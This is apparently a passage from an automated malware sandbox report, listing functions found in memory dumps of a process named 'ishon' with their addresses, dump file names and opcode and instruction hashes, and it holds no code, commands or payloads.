                                                                          Function 012FD01C Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                                                                          • Instruction ID: 040dfa431e2e0366f5b627e0d92f52ced5a1ef118b4bcc851ed9fb8b0c4470dc
                                                                          • Opcode Fuzzy Hash: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                                                                          • Instruction Fuzzy Hash: FF210071614208DFDB15DF68D980B26FF65EB88314F20C57DEA0A4B256C37AD406CA62
                                                                          Function 074CBD8E Relevance: .1, Instructions: 72COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 754987652922edac9bb44d88658105ba49ab6f7d64020a9f3aea794df4266e1c
                                                                          • Instruction ID: ab5cf173b72e0e60a25e440de4f0ec1165fce9e8e24a36c541a0557a6ee1e18b
                                                                          • Opcode Fuzzy Hash: 754987652922edac9bb44d88658105ba49ab6f7d64020a9f3aea794df4266e1c
                                                                          • Instruction Fuzzy Hash: E63157F8A04208CFDB90DF54E986BEEBBB2FB06356F50509AD048A7241DB385D85CF81
                                                                          Function 074CB61F Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0ccc9729d2c60f0aa932f2624d149e5a8343e2648c3f331a5cbf662efb1e73b9
                                                                          • Instruction ID: 5b8f6ff79ba64a4824d641c57c6dbf91fcf7d59f737541eedb46cb5e5c5ebae3
                                                                          • Opcode Fuzzy Hash: 0ccc9729d2c60f0aa932f2624d149e5a8343e2648c3f331a5cbf662efb1e73b9
                                                                          • Instruction Fuzzy Hash: 143113B4A00208CFEB94DF64D98ABEEBBF2FB4A341F50509AD149A7240DB385D84CF55
                                                                          Function 074CE1C1 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf6ca112fc1b5abfe732aa7ea95c36e05736ceb6527005d6e864530a470a36af
                                                                          • Instruction ID: e07f8023975bb6551a5816424342c02db12cdd6b16347f55fb855db2d1d8d263
                                                                          • Opcode Fuzzy Hash: cf6ca112fc1b5abfe732aa7ea95c36e05736ceb6527005d6e864530a470a36af
                                                                          • Instruction Fuzzy Hash: D621C2706002156FC714EF29E805BEE7BEAFF89300F40853DD00ACB695DBB99D098BA1
                                                                          Function 074CE842 Relevance: .1, Instructions: 71COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 1e9502df66cf984e36e8238e907088e4ddbcf60e9f97e10729423e553c97656c
                                                                          • Instruction ID: 5a95cf7e7bfceba3e66f498b28681f616d637758e29a04d1119c74ff6e2208a3
                                                                          • Opcode Fuzzy Hash: 1e9502df66cf984e36e8238e907088e4ddbcf60e9f97e10729423e553c97656c
                                                                          • Instruction Fuzzy Hash: C0214F75A002199FCB15DFA8C4549DEBFB6EF8C320F14812AE815A7390CB759C81CBA0
                                                                          Function 074CB37F Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 55d779baa33020419d059813165a24b6cc71c3faeefc6ce6a9510530267006a1
                                                                          • Instruction ID: ac749c2c0c4b1eba125cbbd48ad49a36301660f26ff291236f735db8d3775f7a
                                                                          • Opcode Fuzzy Hash: 55d779baa33020419d059813165a24b6cc71c3faeefc6ce6a9510530267006a1
                                                                          • Instruction Fuzzy Hash: 5231F2B4900218CFDB94DF64E88ABEEBBB2FB0A345F50509AD449A3281DB385DC4CF51
                                                                          Function 074CBBF9 Relevance: .1, Instructions: 69COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d420649ef3aeb7bb6f78b68b29daaf246fcb3ca3e8df7b0f48a9e5b71908fb0b
                                                                          • Instruction ID: 5695372114acfc6975d0c94c05223e81201ce72c5ced25cbeab10c3adca935e4
                                                                          • Opcode Fuzzy Hash: d420649ef3aeb7bb6f78b68b29daaf246fcb3ca3e8df7b0f48a9e5b71908fb0b
                                                                          • Instruction Fuzzy Hash: 313113B4900208CBDB94DF64D98ABEEBBB2FB0A345F40509AD549A3281DB385DC5CF41
                                                                          Function 074C4518 Relevance: .1, Instructions: 68COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 706703359808ce9c9905b755847ec3dab5a04da102718075d7fcbb69cc40a377
                                                                          • Instruction ID: 504beb5d6d6b29dfc8102247d96b829d5ff7599faa3777631c637cf2cc82d2b1
                                                                          • Opcode Fuzzy Hash: 706703359808ce9c9905b755847ec3dab5a04da102718075d7fcbb69cc40a377
                                                                          • Instruction Fuzzy Hash: 322119B8D0424ACFCB44DFADC6546AEBFF5BB48301F15856ADA15A7340D7349982CF80
                                                                          Function 074CF5E0 Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dc8c6439f43389d5ae3bf1dccfa466976d6a5f1b0e3df45344782c429912c36d
                                                                          • Instruction ID: 8ac79e3ea72a4b6184977189a47a70f6d9fa0a2659f5a178308f3076243d4030
                                                                          • Opcode Fuzzy Hash: dc8c6439f43389d5ae3bf1dccfa466976d6a5f1b0e3df45344782c429912c36d
                                                                          • Instruction Fuzzy Hash: 85110BBA7002159FCB61DF759805BEA7BE6BB89700F14442FE505D7340DB74C94ACBA1
                                                                          Function 074CB28B Relevance: .1, Instructions: 64COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 89ea0b16bfe9653181fb7f3dfb590825ae0e8a11c260e83f02a28f4f07f6bf58
                                                                          • Instruction ID: 332a1651552da1b4adecf59e2fcba63cc2c338da1e1eaee366c153ce8a2dcf0e
                                                                          • Opcode Fuzzy Hash: 89ea0b16bfe9653181fb7f3dfb590825ae0e8a11c260e83f02a28f4f07f6bf58
                                                                          • Instruction Fuzzy Hash: C231F5F4900208CFDB94DF68D999BEDBBB2FB06345F50109AD049A7281DB385D85CF51
                                                                          Function 074CBD25 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cf15ed0f89431245d600eb16c1c1778cb14fb830d022d672438060c64cb4a179
                                                                          • Instruction ID: 86048c2eca02ba9bf9ddd4e72b507f28bef27ae26cdaa194a568d55ba46b0218
                                                                          • Opcode Fuzzy Hash: cf15ed0f89431245d600eb16c1c1778cb14fb830d022d672438060c64cb4a179
                                                                          • Instruction Fuzzy Hash: A13104F4900209CFEB94DF64D99ABEDBBB2FB06346F40609AD149A3281DB385D84CF51
                                                                          Function 074CB207 Relevance: .1, Instructions: 63COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 06ff1e0777de22b44c14dd66ae6ae4daab81273c7642326eecb18e59a4b1d992
                                                                          • Instruction ID: 43f187ad0493deea88b72245bd4eb640e5ed83d842181ec60a9e83940fce59f9
                                                                          • Opcode Fuzzy Hash: 06ff1e0777de22b44c14dd66ae6ae4daab81273c7642326eecb18e59a4b1d992
                                                                          • Instruction Fuzzy Hash: E42128F4900208CFEB94DF55D88ABEEBBB2FB06345F40509AD049A7241DB385D85CF51
                                                                          Function 012FD006 Relevance: .1, Instructions: 62COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                                                                          • Instruction ID: ce825f8d9c534849fdb9ac9605cb3b9934374f04a20d76aab5c69c1d71599319
                                                                          • Opcode Fuzzy Hash: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                                                                          • Instruction Fuzzy Hash: 80217C755093848FDB03CF24D994715BF71EB46314F28C5EEDA498B2A7C33A980ACB62
                                                                          Function 012FD113 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2501967959.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_12fd000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                          • Instruction ID: 11d893d6f3fbbd51bee1d29b5e6278e42b24255ea2a1948aea8cda5011824a08
                                                                          • Opcode Fuzzy Hash: 523fabb44b02fcaa1064eae8d9a10a48e2cd5a800d24befd30ec8c8c27650fb1
                                                                          • Instruction Fuzzy Hash: A211DC76504285CFDB02CF18D9C0B16FF61FB84210F2486A9DA090B656C33AD41ACBA2
                                                                          Function 074CF5F0 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47a0cb976b6f5062cf0815a7403fe9e73c10401040aa7f31fad432ae12625057
                                                                          • Instruction ID: 4e523dc109036796c2163138938bdcb33444e19e3416dc15f57be930d1bede9b
                                                                          • Opcode Fuzzy Hash: 47a0cb976b6f5062cf0815a7403fe9e73c10401040aa7f31fad432ae12625057
                                                                          • Instruction Fuzzy Hash: 4611C2B9B002159FCB60DF698805BEE7BF6AF89700F10442AE505D7390DB78CD06CBA1
                                                                          Function 074CF361 Relevance: .1, Instructions: 55COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2500ae2ebe64c053743827abec00563c8b13dfa5d383b7397d57640107590f20
                                                                          • Instruction ID: 91708f7310c68e33ed944d024594ffacb7337c7773ac59f28aa663b39b8a5dbf
                                                                          • Opcode Fuzzy Hash: 2500ae2ebe64c053743827abec00563c8b13dfa5d383b7397d57640107590f20
                                                                          • Instruction Fuzzy Hash: 15216279A42259AFCB44CF98D5A4EADB7F2BF49300F214059E401EB371CB34AD45CB50
                                                                          Function 074CF240 Relevance: .1, Instructions: 51COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ed3792ccbeda34e66c4e364a8463878608d2f3f3515e193d0986338a07484568
                                                                          • Instruction ID: 05dec89f43b0dc3389f573fda9caf44e3d1edc36f9ffb325674e28bf3ced5c9d
                                                                          • Opcode Fuzzy Hash: ed3792ccbeda34e66c4e364a8463878608d2f3f3515e193d0986338a07484568
                                                                          • Instruction Fuzzy Hash: 0701447A340215AFDB10CE59DC95F9BB7A9FB88721F10806AFA15CB290C6B2D9158B90
                                                                          Function 074C4509 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 216ea41c4678393a327e5fb7f0062379866332b049060b39dfb3ab753fb8e1cb
                                                                          • Instruction ID: c31428432a670363b444fc66ffdaeb4f4aecc5a23b64b3421c03f250ec94f43b
                                                                          • Opcode Fuzzy Hash: 216ea41c4678393a327e5fb7f0062379866332b049060b39dfb3ab753fb8e1cb
                                                                          • Instruction Fuzzy Hash: 191127B8D082899FDB44DFAA96412EEBFF5AB85300F4585ABD508A3241D7344A85CB91
                                                                          Function 074CFA70 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 42f77f477ed9aa2dad08efb056fd8821fc5a45d71ec4c879e463b31748c7d34f
                                                                          • Instruction ID: 82b918d2e684e596f1aabf4819a07f96fca64487fb3c4b559008243b539a9a1c
                                                                          • Opcode Fuzzy Hash: 42f77f477ed9aa2dad08efb056fd8821fc5a45d71ec4c879e463b31748c7d34f
                                                                          • Instruction Fuzzy Hash: 0901DBB72055519FC301CB5ED880892FB65EB86360715D17BE528C7742C725EC5BC7E1
                                                                          Function 074CE668 Relevance: .0, Instructions: 44COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 469cc9407915b465bd1f95cdb5b06d3034c6764d5dd92d4bda1461616d876960
                                                                          • Instruction ID: 4f555a4aab513f91dac438bfd9884519d307c91c66453c498390999f59948fb3
                                                                          • Opcode Fuzzy Hash: 469cc9407915b465bd1f95cdb5b06d3034c6764d5dd92d4bda1461616d876960
                                                                          • Instruction Fuzzy Hash: 66F02872B042215FE315961498107ABFBA8EF89320F04456FE5048B391CAB5AC41C790
                                                                          Function 074C4070 Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: de1c0985eeed05f80059637e548ab2e23e7888688363d7df667aa6612a27c2c3
                                                                          • Instruction ID: eb0d9078c38ea1ec98ed30da8879d4ce95b11574d2237f09608c74037655404b
                                                                          • Opcode Fuzzy Hash: de1c0985eeed05f80059637e548ab2e23e7888688363d7df667aa6612a27c2c3
                                                                          • Instruction Fuzzy Hash: 600124B4C09248DFDB41DFA8D9542EEBFF4FB49310F1084ABD405A3281D7345A45CBA2
                                                                          Function 074CC491 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 375711e7216f010e9608b141fdbb8f01a8392f4500c3b7bb8f142bcd8961a95a
                                                                          • Instruction ID: defbd566b4c75894e5e5dec5dd4e3a0bb71d2c6a26796ad703356fd89927b11c
                                                                          • Opcode Fuzzy Hash: 375711e7216f010e9608b141fdbb8f01a8392f4500c3b7bb8f142bcd8961a95a
                                                                          • Instruction Fuzzy Hash: 41016D78E04248AFC781CFA8D8415ADFBB4EB49210F10C1DBD81CD7741C6369A12CF91
                                                                          Function 075F2F40 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520755423.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_75f0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d592233a0f7c7073d881caa700391c41e6aad6318119abbacad7ca73b5718786
                                                                          • Instruction ID: 0eac04c6544a85a5b7986e42011973218701637d9301750b3d0878b5eda6927d
                                                                          • Opcode Fuzzy Hash: d592233a0f7c7073d881caa700391c41e6aad6318119abbacad7ca73b5718786
                                                                          • Instruction Fuzzy Hash: C1013CF5614205AFDB24CE98D485ADEFBF5FB48320F1484ABE648D7290E731D981CB50
                                                                          Function 074CE6D0 Relevance: .0, Instructions: 38COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7c3f54c96cbafccac549a3fed02c7d5475a2477214d963c7f052abdfaa334df
                                                                          • Instruction ID: dff61857d64d4fe7a150f15daf8b3d7de348cf76f9f311ef86e904e2b9f15b90
                                                                          • Opcode Fuzzy Hash: b7c3f54c96cbafccac549a3fed02c7d5475a2477214d963c7f052abdfaa334df
                                                                          • Instruction Fuzzy Hash: BAF02BE6B4E2A15FD32242381C107A57FE19B86204F0404DFC1818F3A2DF568803C351
                                                                          Function 074CE678 Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 64ecfd4f67a7a8c84605196a3ade45d66895bc4b7199208b66bbdc3cabe6fd8b
                                                                          • Instruction ID: e5549cbfb71988ee9e0ec66785b2585a83342fcbe39a30ac09d8d6b19cd1040d
                                                                          • Opcode Fuzzy Hash: 64ecfd4f67a7a8c84605196a3ade45d66895bc4b7199208b66bbdc3cabe6fd8b
                                                                          • Instruction Fuzzy Hash: 06F0E975F442215FE71496189810B6BFBE9EFC9710F14482ED5059B390CBB5AC4183D4
                                                                          Function 074CF232 Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: c7224bc639c32fa72da49c08d269ae08d50f3f5451909df167f36a289b1fed17
                                                                          • Instruction ID: 7851c2768c7b31bcfa3a1da5f42d08b2cbb8be14abeb964d6c35c55c27badc55
                                                                          • Opcode Fuzzy Hash: c7224bc639c32fa72da49c08d269ae08d50f3f5451909df167f36a289b1fed17
                                                                          • Instruction Fuzzy Hash: 3AF0307A3042519FC705CF69E894C9ABBA9AF8A66031181ABF505CB321CA75DC04CBA0
                                                                          Function 074CB86E Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: acfa171ff8dc281321afadf12462f5b12b7fe1775118b6524efdf836158b3c02
                                                                          • Instruction ID: d0bf6edeb64d6d22038b148d3ab1a029f74320a5e2b6f4359d94872617deb335
                                                                          • Opcode Fuzzy Hash: acfa171ff8dc281321afadf12462f5b12b7fe1775118b6524efdf836158b3c02
                                                                          • Instruction Fuzzy Hash: B9018CB4A00258CFE750DF69DD98BD97BB6FB86306F505289E448A7380DB385C86CF10
                                                                          Function 074C87D5 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dd07a981c271415bba9dbaa3c74ee506c87335dc33b7aaa80b7668936b43cd4b
                                                                          • Instruction ID: d5f0cefc729c1539bba9044ebec1f7bfe9bcd89ead768bb262c3460f98f1aaf4
                                                                          • Opcode Fuzzy Hash: dd07a981c271415bba9dbaa3c74ee506c87335dc33b7aaa80b7668936b43cd4b
                                                                          • Instruction Fuzzy Hash: D61192B49016248FDBA4DF24DD54A9ABBF1BF49202F5051DAD50EA7291DB305E85CF40
                                                                          Function 074CBC72 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 8fd9b03017ec4d30f3b5fd63dfa4f8aafb25b1600c285db4e3a2542f9e96550b
                                                                          • Instruction ID: f0b03d20b3b1dd44ba19fb36f0e32a0a5f6b5ba44594d424bd7042e561fb7611
                                                                          • Opcode Fuzzy Hash: 8fd9b03017ec4d30f3b5fd63dfa4f8aafb25b1600c285db4e3a2542f9e96550b
                                                                          • Instruction Fuzzy Hash: EC01E4B8A041598FD794DFAAC8846A9B6F6FB8A341F40A16E840AA7245DF348C81CF40
                                                                          Function 074C4080 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: acd62171ce855bfade37a9ecb54450996653ec1537c6dfff9b434991da806be7
                                                                          • Instruction ID: 3a7579f0db9c33756f09d772b922524dd5dcb1ef4638202aea884293bcee5c58
                                                                          • Opcode Fuzzy Hash: acd62171ce855bfade37a9ecb54450996653ec1537c6dfff9b434991da806be7
                                                                          • Instruction Fuzzy Hash: 7CF014B4D01209DFCB80DFA8D9442AEBBF8BB08310F2044AA9808A3280E7315A51CB91
                                                                          Function 074CB553 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: aa33b6697d005f678cbf25878c05063080aa1e49c0512ae088d0de27a0eebdef
                                                                          • Instruction ID: a045f12352e0039e066667661c3f97b57a766ae90103f3dab0c57d23d33e591b
                                                                          • Opcode Fuzzy Hash: aa33b6697d005f678cbf25878c05063080aa1e49c0512ae088d0de27a0eebdef
                                                                          • Instruction Fuzzy Hash: DD0104B8A08218CFCB50DFA4D9847AABBF2FB4A701F40519A840DA7344DB385E85CF52
                                                                          Function 074CD4F0 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2520689989.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_74c0000_ishon.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
